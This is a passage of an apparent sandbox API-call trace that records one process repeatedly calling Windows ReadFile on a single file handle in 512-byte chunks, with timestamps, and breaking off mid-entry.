ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, 
lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, 
lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: 
lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, 
lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, 
lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile 
(in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 
[0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, 
lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, 
lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, 